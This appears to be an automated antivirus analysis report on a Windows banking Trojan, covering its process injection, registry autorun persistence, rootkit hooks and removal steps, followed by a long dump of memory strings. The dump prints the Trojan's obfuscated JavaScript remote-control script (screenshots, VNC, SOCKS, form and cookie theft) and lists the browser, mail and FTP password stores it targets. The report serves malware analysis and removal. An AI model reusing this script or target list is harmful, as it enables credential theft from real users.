Trojan.Generic.12107030_ee47246c50

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:668

The Trojan injects its code into the following process(es):

vmacthlp.exe:924
wmiprvse.exe:628
Explorer.EXE:888
spoolsv.exe:1436
jqs.exe:1592

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:668 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CehdaGrafu\VoddAlaj.dat (266 bytes)

Registry activity

The process %original file name%.exe:668 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 DC 2D A1 97 00 0E D6 8D 39 E6 50 92 21 DC 4D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{7BD47FDD-1028-4944-A268-024C76A61BA9}]
"#sd" = "63 3A 5C 65 65 34 37 32 34 36 63 35 30 32 36 64"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VoddAlaj" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat"

The process vmacthlp.exe:924 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Classes\CLSID\{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}]
"{4E153850-602D-4819-B83D-3CCD0A1E7351}" = "DE B7 A4 9F"

Dropped PE files

MD5	File path
d2fff8c6b58b7e5bd6c0c4fdaf6b5b3d	c:\Documents and Settings\All Users\Application Data\VoddAlaj\VoddAlaj.dat

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateProcessA
CreateProcessW

Propagation

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):

   %original file name%.exe:668
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:

   %Documents and Settings%\%current user%\Local Settings\Temp\CehdaGrafu\VoddAlaj.dat (266 bytes)

5. Delete the following value(s) in the autorun key (How to Work with System Registry):

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "VoddAlaj" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat"

6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	306892	307200	5.26182	54d9d2f38f303c7785f14c183a0c45ea
.rdata	311296	4400	8192	2.64502	39af15acc65098d32a24596c11ba5961
.data	319488	35680	36864	0.514299	4b4f2d93202e1fafb9eed6b8ecb1558c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

wmiprvse.exe_628_rwx_00DD0000_00054000:

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

%Documents and Settings%\All Users\Application Data\VoddAlaj\VoddAlaj.dat

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

